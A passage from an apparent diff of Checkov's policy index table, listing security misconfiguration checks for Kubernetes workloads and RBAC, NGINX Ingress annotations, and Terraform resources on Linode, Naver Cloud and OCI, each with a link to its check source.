--tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3517 | CKV_K8S_148 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3518 | CKV_K8S_149 | resource | CronJob | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3519 | CKV_K8S_149 | resource | DaemonSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3520 | CKV_K8S_149 | resource | Deployment | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3521 | CKV_K8S_149 | resource | DeploymentConfig | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3522 | CKV_K8S_149 | resource | Job | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3523 | CKV_K8S_149 | resource | Pod | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3524 | CKV_K8S_149 | resource | PodTemplate | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | 
[KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3525 | CKV_K8S_149 | resource | ReplicaSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3526 | CKV_K8S_149 | resource | ReplicationController | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3527 | CKV_K8S_149 | resource | StatefulSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3528 | CKV_K8S_151 | resource | CronJob | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3529 | CKV_K8S_151 | resource | DaemonSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3530 | CKV_K8S_151 | resource | Deployment | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3531 | CKV_K8S_151 | resource | DeploymentConfig | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | 
Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3532 | CKV_K8S_151 | resource | Job | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3533 | CKV_K8S_151 | resource | Pod | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3534 | CKV_K8S_151 | resource | PodTemplate | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3535 | CKV_K8S_151 | resource | ReplicaSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3536 | CKV_K8S_151 | resource | ReplicationController | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3537 | CKV_K8S_151 | resource | StatefulSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) |
+| 3538 | CKV_K8S_152 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py) |
+| 3539 | CKV_K8S_153 | resource | Ingress | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py) |
+| 3540 | CKV_K8S_154 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py) |
+| 3541 | CKV_K8S_155 | resource | ClusterRole | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations | Kubernetes | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py) |
+| 3542 | CKV_K8S_156 | resource | ClusterRole | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests | Kubernetes | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py) |
+| 3543 | CKV_K8S_157 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) |
+| 3544 | CKV_K8S_157 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) |
+| 3545 | CKV_K8S_158 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) |
+| 3546 | CKV_K8S_158 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) |
+| 3547 | CKV2_K8S_1 | resource | ClusterRole | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
+| 3548 | CKV2_K8S_1 | resource | ClusterRoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
+| 3549 | CKV2_K8S_1 | resource | Role | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
+| 3550 | CKV2_K8S_1 | resource | RoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) |
+| 3551 | CKV2_K8S_2 | resource | ClusterRole | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
+| 3552 | CKV2_K8S_2 | resource | ClusterRoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
+| 3553 | CKV2_K8S_2 | resource | Role | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
+| 3554 | CKV2_K8S_2 | resource | RoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) |
+| 3555 | CKV2_K8S_3 | resource | ClusterRole | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
+| 3556 | CKV2_K8S_3 | resource | ClusterRoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
+| 3557 | CKV2_K8S_3 | resource | Role | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
+| 3558 | CKV2_K8S_3 | resource | RoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) |
+| 3559 | CKV2_K8S_4 | resource | ClusterRole | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
+| 3560 | CKV2_K8S_4 | resource | ClusterRoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
+| 3561 | CKV2_K8S_4 | resource | Role | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
+| 3562 | CKV2_K8S_4 | resource | RoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) |
+| 3563 | CKV2_K8S_5 | resource | ClusterRole | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
+| 3564 | CKV2_K8S_5 | resource | ClusterRoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
+| 3565 | CKV2_K8S_5 | resource | Role | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
+| 3566 | CKV2_K8S_5 | resource | RoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) |
+| 3567 | CKV2_K8S_6 | resource | Deployment | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) |
+| 3568 | CKV2_K8S_6 | resource | Pod | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) |
+| 3569 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) |
+| 3570 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) |
+| 3571 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) |
+| 3572 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) |
+| 3573 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) |
+| 3574 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) |
+| 3575 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) |
+| 3576 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) |
+| 3577 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) |
+| 3578 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) |
+| 3579 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) |
+| 3580 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) |
+| 3581 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) |
+| 3582 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) |
+| 3583 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) |
+| 3584 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) |
+| 3585 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) |
+| 3586 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) |
+| 3587 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) |
+| 3588 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) |
+| 3589 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) |
+| 3590 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) |
+| 3591 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) |
+| 3592 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) |
+| 3593 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) |
+| 3594 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) |
+| 3595 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) |
+| 3596 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) |
+| 3597 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) |
+| 3598 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) |
+| 3599 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) |
+| 3600 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) |
+| 3601 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) |
+| 3602 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) |
+| 3603 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) |
+| 3604 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) |
+| 3605 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) |
+| 3606 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) |
+| 3607 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) |
+| 3608 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) |
+| 3609 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) |
+| 3610 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) |
+| 3611 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) |
+| 3612 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) |
+| 3613 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) |
+| 3614 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) |
+| 3615 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) |
+| 3616 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) |
+| 3617 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) |
+| 3618 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) |
+| 3619 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) |
+| 3620 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) |
+| 3621 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) |
+| 3622 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) |
